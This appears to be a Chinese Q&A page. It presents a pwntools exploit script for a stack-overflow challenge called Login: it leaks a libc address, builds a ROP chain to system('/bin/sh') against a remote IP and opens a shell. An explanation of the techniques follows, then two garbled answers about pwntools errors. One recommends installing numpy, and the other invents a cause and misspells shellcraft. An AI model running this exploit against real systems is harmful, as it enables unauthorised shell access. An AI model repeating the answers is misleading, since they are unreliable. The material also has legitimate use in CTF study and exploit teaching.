from pwn import * import struct import os context(os='linux', arch='amd64', log_level='debug') elf = ELF("./Login") libc = ELF("./libc-2.23.so") DEBUG = 0 def exp(p): p.recvuntil("Here is a tip: 0x") std_addr = int(p.recv(12), 16) info("std_addr----->"+hex(std_addr)) libc.address = std_addr - 0x3c48e0 p.recvuntil("input the username:\n") p.send(b"a"*28+b"\xCC\x15\xCC\x15") p.recvuntil("input the password:\n") payload = b"a"*0x28 + p64(0x00000000004008c3) + p64(libc.search(b"/bin/sh").__next__()) + p64(libc.sym["system"]) p.send(payload) p.interactive() def main(): if DEBUG: p = process("./Login") gdb.attach(p, "source ./.gdbinit") exp(p) else: p = remote("59.110.164.72", 10000) exp(p) if __name__ == "__main__": main()这串代码的知识点
时间: 2024-04-28 22:24:03 浏览: 11
这是一段使用 pwntools 库编写的 exploit 脚本,用于攻击一个名为 Login 的程序。该脚本的主要作用是通过溢出 Login 程序的缓冲区来实现攻击,并最终获取一个 shell。
具体来说,该脚本的主要知识点包括:
1. 使用 pwntools 库中的各种函数来与目标程序进行交互,如 `recvuntil`、`send`、`interactive` 等。
2. 使用 `ELF` 类来解析目标程序的 ELF 文件,获取其中的地址信息等。
3. 使用 `libc` ELF 文件中的符号来获取函数地址,如 `search`、`sym` 等。
4. 使用 `gdb` 调试工具来调试目标程序,如 `process`、`attach` 等。
5. 利用栈溢出漏洞来覆盖程序的返回地址,从而实现控制程序流程的目的。
6. 利用泄漏的地址信息计算出 libc 的基地址,从而获取 libc 中的函数地址。
7. 利用 `system` 函数来执行 shell 命令,从而获取 shell。
相关问题
from pwn import * ImportError: No module named pwn
当出现`ImportError: No module named ***`的错误时,通常是因为Python无法找到所需的模块。这可能是由于以下原因之一导致的:
1. 模块未安装:确保你已经使用pip或其他包管理器正确安装了所需的模块。如果你没有安装该模块,可以使用以下命令安装numpy模块:
```shell
pip install numpy
```
2. 模块路径错误:如果模块已经安装,但Python仍然无法找到它,可能是因为模块的路径未正确设置。你可以尝试将模块路径添加到PYTHONPATH环境变量中。在Linux或Mac系统中,可以使用以下命令将模块路径添加到PYTHONPATH中:
```shell
export PYTHONPATH=/usr/local/lib/python2.7/site-packages
```
请注意,上述命令中的路径`/usr/local/lib/python2.7/site-packages`是一个示例路径,你需要将其替换为你实际安装模块的路径。
from pwn import * Traceback (most recent call last):
这个错误是因为你尝试使用pwntools的asm模块,但是你没有正确导入shellcrash.sh()函数。正确的导入方式应该是先定义shellcode,然后再使用asm()函数将其转换为机器码。例如:
```
from pwn import *
shellcode = asm(shellcraft.sh())
```
这样就可以正确导入并使用asm模块了。